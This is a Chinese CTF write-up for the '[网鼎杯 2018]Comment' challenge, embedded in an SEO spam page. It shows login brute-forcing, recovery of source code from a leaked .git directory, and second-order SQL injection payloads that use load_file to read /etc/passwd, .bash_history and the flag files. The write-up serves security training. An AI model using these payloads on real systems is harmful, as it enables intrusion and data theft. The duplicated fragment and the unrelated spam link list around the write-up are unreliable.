当前位置: 首页 > news >正文

企业建站项目河南便宜网站建设费用

企业建站项目,河南便宜网站建设费用,做网站的大骗子,wordpress怎么关注站点使用环境为https://adworld.xctf.org.cn/challenges,搜索题目[网鼎杯 2018]Comment。 进入环境,发现为一个留言板,点击发帖试试。 尝试发帖 跳转到登录页面,根据提示使用burp进行暴力破解。 发现payload为666时状态码不同。 尝试…

使用环境为https://adworld.xctf.org.cn/challenges,搜索题目[网鼎杯 2018]Comment。

进入环境,发现为一个留言板,点击发帖试试。

在这里插入图片描述

尝试发帖

在这里插入图片描述

跳转到登录页面,根据提示使用burp进行暴力破解。

在这里插入图片描述

发现payload为666时状态码不同。

在这里插入图片描述

尝试密码为zhangwei666发现登录成功。

使用awvs进行扫描。发现存在.git目录,并且存在git泄露漏洞。尝试使用githacker恢复源码。

在这里插入图片描述

刚恢复完是一段残缺的代码,需要进行恢复到完整代码

git log --reflog
git reset --hard 版本

完整源码

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){header("Location: ./login.php");die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':$category = addslashes($_POST['category']);$title = addslashes($_POST['title']);$content = addslashes($_POST['content']);$sql = "insert into boardset category = '$category',title = '$title',content = '$content'";$result = mysql_query($sql);header("Location: ./index.php");break;
case 'comment':$bo_id = addslashes($_POST['bo_id']);$sql = "select category from board where id='$bo_id'";$result = mysql_query($sql);$num = mysql_num_rows($result);if($num>0){$category = mysql_fetch_array($result)['category'];$content = addslashes($_POST['content']);$sql = "insert into commentset category = '$category',content = '$content',bo_id = '$bo_id'";$result = mysql_query($sql);}header("Location: ./comment.php?id=$bo_id");break;
default:header("Location: ./index.php");
}
}
else{header("Location: ./index.php");
}
?>

分析代码可知,当do=write时,传入的参数中的单引号均被过滤掉,而当do=comment时,category被直接拿来用,没有被过滤单引号,那么二次注入点就在此。

构建payload:

在do=write时,title和content随便写,将category写成下面payload

',content=database(),/*

然后在do=comment时,将content写成

*/#

也就合成了一个查询函数

    $sql = "insert into commentset category = '',content=database(),/*',content = '*/#',bo_id = '$bo_id'";

查询flag是根据网上的资料查找的。

查看当前登录的用户

',content=user(),/*

在这里插入图片描述

得知使用者是root权限

sql注入读取本地文件,使用load_file()
/etc/passwd这里存储用户信息

',content=(select load_file('/etc/passwd')),/*

在这里插入图片描述

有一个www用户,查看bash_history

',content=(select load_file('/home/www/.bash_history')),/*

在这里插入图片描述

发现有一操作rm -f .DS_Store删除了.DS_Store这个文件。而 .DS_Store 文件中,经常会有一些不可见的字符,可以使用hex函数对其进行16进制转换。

',content=(select hex(load_file('/tmp/html/.DS_Store'))),/*

在这里插入图片描述

全部复制并且进行ascii 十六进制解码。

在这里插入图片描述

发现有一段flag_8946e1ff1ee3e40f.php,尝试查看这个文件

',content=(select load_file('/tmp/html/flag_8946e1ff1ee3e40f.php')),/*

在这里插入图片描述

发现为空,那就加上hex尝试

',content=(select hex(load_file('/tmp/html/flag_8946e1ff1ee3e40f.php'))),/*

在这里插入图片描述

解码

在这里插入图片描述

得到结果

<?php
$flag = 'flag{f9ca1a6b-9d78-11e8-90a3-c4b301b7b99b}';
?>

但是提交答案发现是假的,尝试其他目录

',content=(select hex(load_file('/var/www/html/flag_8946e1ff1ee3e40f.php'))),/*

在这里插入图片描述

解码

在这里插入图片描述

<?php$flag="flag{0dd14aae81d94904b3492117e2a3d4df}";
?>

ee3e40f.php’))),/*


[外链图片转存中...(img-EZ2sqSXR-1722830529065)]解码[外链图片转存中...(img-OSTJQXO8-1722830529065)]
<?php $flag="flag{0dd14aae81d94904b3492117e2a3d4df}"; ?>

得到正确的flag
http://www.yayakq.cn/news/574970/

相关文章:

  • h5建设网站教程代理记账公司如何寻找客户
  • 营销型网站托管注册公司要多久下来
  • 网站美工培训课程北京品牌网站建设
  • 网站域名地址查询家政公司网站建设方案
  • 做销售在哪个网站找客户端鄂尔多斯网站网站建设
  • 做网站可以申请个体户么市场营销方案怎么做
  • 网站架构怎么看雇人做淘宝网站多少钱
  • 市中移动网站建设学什么可以做网站
  • 网站建设常州seo在线短视频发布页
  • 网站建设开发定制做网站什么语言好
  • 西安网站品牌建设seo网站设计网页单页设计
  • 安全狗iis版删了以后 网站打不开网站的seo后台怎么做
  • 苏州高端网站建设定制智慧团建如何在手机上登录
  • dw做网站简单吗重庆网站制作合作商
  • html5 响应式网站应用市场app
  • 做棋牌网站抓到会怎么量刑东莞房价将暴跌
  • 如何做网站数据报表wordpress地图主题
  • 品牌网站建设价位如何防止网站被镜像
  • 广州建设高端网站刷网站关键词工具
  • 网站设计就业形势做网站被骗怎么办
  • wordpress做阿里巴巴国际站广西模板十大名牌排名榜
  • 英文网站的外部链接 建设2345手机浏览器
  • 网站建设和运行费用网站开发字体的引用
  • 不正规网站制作做网站和微信公众平台如何定价
  • 顺义电大网上作业在那个网站做昆明网签备案查询
  • 那些网站可以做反链怎么建设物流网站
  • 专业网站定制报价wordpress主题代码框架
  • :wordpress网站如何播放自己的视频怎么快速提升网站权重
  • 网站建设 竞赛 方案惠州建设公司网站
  • 静态网站怎么容易做建设高端网站需要多少钱